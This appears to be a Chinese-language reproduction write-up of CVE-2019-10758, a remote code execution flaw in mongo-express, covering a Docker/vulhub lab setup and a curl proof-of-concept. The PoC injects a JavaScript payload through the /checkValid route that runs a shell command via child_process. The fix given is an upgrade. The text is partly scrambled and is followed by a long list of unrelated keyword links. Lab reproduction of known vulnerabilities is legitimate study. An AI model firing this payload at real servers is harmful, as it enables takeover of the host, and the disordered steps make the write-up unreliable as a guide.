Mongo-express远程代码怎样执行CVE-2019-10758复现
发表于:2025-12-02 作者:千家信息网编辑
千家信息网最后更新 2025年12月02日,Mongo-express远程代码怎样执行CVE-2019-10758复现,针对这个问题,这篇文章详细介绍了相对应的分析和解答,希望可以帮助更多想解决这个问题的小伙伴找到更简单易行的方法。0x01 简
千家信息网最后更新 2025年12月02日Mongo-express远程代码怎样执行CVE-2019-10758复现0x01 简介 Mongo-express是MongoDB的数据库管理工具,类似Navicat对应Mysql的关系,其使用Node.js,Express和Bootstrap3编写的基于Web的MongoDB图形化管理界面。 0x02 漏洞概述
0x03 影响版本 mongo-express < 0.54.0 使用docker首先搭建MongoDB数据库
再搭建一个存在漏洞版本得express并连接到上面得MongoDB
看到以下信息即可说明搭建成功
访问本机8081端口,可以看到Mongo-express界面
当然也可以直接使用vulhub
查看创建的文件
Mongo-express远程代码怎样执行CVE-2019-10758复现,针对这个问题,这篇文章详细介绍了相对应的分析和解答,希望可以帮助更多想解决这个问题的小伙伴找到更简单易行的方法。
漏洞问题出在lib/bson.js中的toBSON()函数中,路由 /checkValid 从外部接收输入,并调用了存在 RCE 漏洞的代码,由此存在被攻击的风险。
0x04 环境搭建
docker run --name MyMongo -d mongo:3.2
docker run -it --rm -p 8081:8081 --link MyMongo:mongo mongo-express:0.49
访问本机8081端口,可以看到Mongo-express界面
git clone https://github.com/vulhub/vulhub.gitcd vulhub/mongo-express/CVE-2019-10758docker-compose up -d
0x05 漏洞复现
使用网上Poccurl 'http://localhost:8081/checkValid' -H 'Authorization: Basic YWRtaW46cGFzcw==' --data 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("echo Str1am > file.txt")'看到返回Valid且MongoDB界面返回200即为成功
0x06 修复方式
升级至0.54.0以上版本
关于Mongo-express远程代码怎样执行CVE-2019-10758复现问题的解答就分享到这里了,希望以上内容可以对大家有一定的帮助,如果你还有很多疑惑没有解开,可以关注行业资讯频道了解更多相关知识。
漏洞
问题
代码
版本
界面
成功
数据
数据库
更多
帮助
管理
解答
易行
简单易行
信息
内容
函数
图形
小伙
小伙伴
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
成都数据库招聘
simulink软件开发
公司电脑没有连接到服务器
h5怎么连接数据库
苏州智能化软件开发供应商
云开发的数据库怎么删除
方舟服务器需要一直开着电脑吗
华为网络技术工程师有前途吗
四川广电网络技术测试岗
计算机网络技术学的科目
公共管理下的网络安全
退役局网络安全周计划
金山区好的软件开发哪家便宜
数据库er土
徐汇区网络安全管理体系证书认证
可以接软件开发的网站
怎么退出数据库模式i
设立网络安全专业报告
一个月学软件开发
软件开发程序员就业培训
网络安全法的监控部门是
数据库默认实例怎么修改
通讯录服务器
数据库创建角色报错
网络技术服务进口
sql数据库数值为空怎么表示
税控盘安全接入服务器地址深圳
方舟生存进化服务器作弊管理
网络安全法律法规宣传活动总结
迪普科技与网络安全
